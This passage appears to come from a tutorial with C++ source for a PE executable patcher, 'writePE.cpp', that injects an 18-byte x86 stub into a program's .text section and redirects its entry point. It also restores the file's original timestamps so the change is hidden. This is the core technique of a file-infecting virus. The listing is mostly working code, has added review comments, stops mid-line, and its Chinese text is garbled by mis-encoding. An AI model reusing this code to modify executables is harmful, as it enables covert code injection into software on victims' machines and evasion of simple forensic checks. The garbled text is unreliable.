----- -------- -------- 01 .text 0000CCC0 00001000 0000CE00 00000600 60000020 [CER] 02 .data 00004628 0000E000 00002C00 0000D400 C0000040 [IRW] 03 .rsrc 000003C8 00013000 00000400 00010000 40000040 [IR] Key to section flags: C - contains code E - executable I - contains initialized data R - readable W - writeable
é????èê?′????t?D′??ú3?????°??????μ?D??¢£?êμ?êé??ò??μ?′ú???éò?D′è?è?o?ò?????£??aà??ò????“.text”???£
ó?è???′ú??μ?μ?ò???PE??ê??é?′DD???tμ?í·D??¢£o
//writePE.cpp
#include <windows.h>
#include <stdio.h>
#include <io.h>
#include <fcntl.h>
#include <time.h>
#include <SYS\STAT.H>

// 18-byte x86 template: 6A 40 and three 6A 00 are PUSH imm8, E8 is CALL rel32,
// E9 is JMP rel32.
// NOTE(review): the two rel32 fields look like placeholders that writefile()
// (not shown here) fills in -- confirm against that function.
unsigned char writeline[18]={ 0x6a,0x40,0x6a,0x0,0x6a,0x0,0x6a,0x0,0xe8,0x01,0x0,0x0,0x0,0xe9,0x0,0x0,0x0,0x0 };

// File-scope state shared between main() and the helpers it calls.
// NOTE(review): nothing in main() assigns these; presumably map_exe() and
// writefile() fill them from the PE headers -- confirm.
DWORD space;            // compared against 50 in main() before writefile() runs
DWORD entryaddress;
DWORD entrywrite;
DWORD progRAV;
DWORD oldentryaddress;
DWORD newentryaddress;
DWORD codeoffset;
DWORD peaddress;
DWORD flagaddress;
DWORD flags;
DWORD virtsize;
DWORD physaddress;
DWORD physsize;
DWORD MessageBoxAadaddress;

// Entry point. argv[1] is the path of an existing file. The file's three
// timestamps are saved, the file is mapped read-only and handed to map_exe(),
// writefile() is called when the global `space` is at least 50, and finally
// the saved timestamps are written back to the file.
// Returns EXIT_FAILURE when the file cannot be opened or mapped, 0 otherwise.
// NOTE(review): argv[1] is read without checking argc.
// NOTE(review): map_exe(), printaddress() and writefile() are called with no
// prototype visible above this point -- presumably declared in a part of the
// listing that is not shown.
int main(int argc,char * * argv)
{
    HANDLE hFile, hMapping;
    void *basepointer;
    FILETIME * Createtime;
    FILETIME * Accesstime;
    FILETIME * Writetime;
    // NOTE(review): these three allocations are not freed on the early-return
    // paths below.
    Createtime = new FILETIME;
    Accesstime = new FILETIME;
    Writetime = new FILETIME;
    if ((hFile = CreateFile(argv[1], GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN, 0)) == INVALID_HANDLE_VALUE)// open the file that is going to be modified
    {
        puts("(could not open)");
        return EXIT_FAILURE;
    }
    // NOTE(review): on failure only a message is printed; the FILETIME values
    // stay uninitialised and are still passed to SetFileTime() further down.
    // GetLastError() returns a DWORD, which does not match the %d conversion.
    if(!GetFileTime(hFile,Createtime,Accesstime,Writetime))
    {
        printf("\nerror getfiletime: %d\n",GetLastError());
    }
    // get the creation, access and last-write times of the file to be modified
    if (!(hMapping = CreateFileMapping(hFile, 0, PAGE_READONLY | SEC_COMMIT, 0, 0, 0)))
    {
        puts("(mapping failed)");
        CloseHandle(hFile);
        return EXIT_FAILURE;
    }
    if (!(basepointer = MapViewOfFile(hMapping, FILE_MAP_READ, 0, 0, 0)))
    {
        puts("(view failed)");
        CloseHandle(hMapping);
        CloseHandle(hFile);
        return EXIT_FAILURE;
    }
    // store the mapped image of the file header in basepointer
    // Both handles are closed before the view is used; the view itself is
    // released by UnmapViewOfFile() below.
    CloseHandle(hMapping);
    CloseHandle(hFile);
    map_exe(basepointer);// get the relevant addresses
    UnmapViewOfFile(basepointer);
    printaddress();
    printf("\n\n");
    // The message below is mis-encoded in this listing and is reproduced as
    // found; it presumably reads "space too small, data cannot be written".
    if(space<50)
    {
        printf("\n????ì?D?,êy?Y2??üD′è?.\n");
    }
    else
    {
        writefile();// write the file
    }
    if ((hFile = CreateFile(argv[1], GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN, 0)) == INVALID_HANDLE_VALUE)
    {
        puts("(could not open)");
        return EXIT_FAILURE;
    }
    // NOTE(review): same DWORD / %d mismatch as in the GetFileTime() branch.
    if(!SetFileTime(hFile,Createtime,Accesstime,Writetime))
    {
        printf("error settime : %d\n",GetLastError());
    }
    // restore the file's creation time etc. after the modification
    // NOTE(review): once the saved values are written back, the file's
    // creation/access/write times no longer show that it was rewritten; a
    // content hash or an Authenticode signature check does not depend on
    // these timestamps and still reflects a changed image.
    delete Createtime;
    delete Accesstime;
    delete Writetime;
    CloseHandle(hFile);
    return 0;
}
void map_exe(const void *base)
{
    IMAGE_DOS_HEADER * dos_head;
    dos_head =(IMAGE_DOS_HEADER *)base;
#include <pshpack1.h>
    typedef struct PE_HEADER_MAP
    {
        DWORD signature;
        IMAGE_FILE_HEADER _head;
        IMAGE_OPTIONAL_HEADER opt_head;
        IMAGE_SECTION_HEADER section_header[];
    } peHeader;
#include <poppack.h&g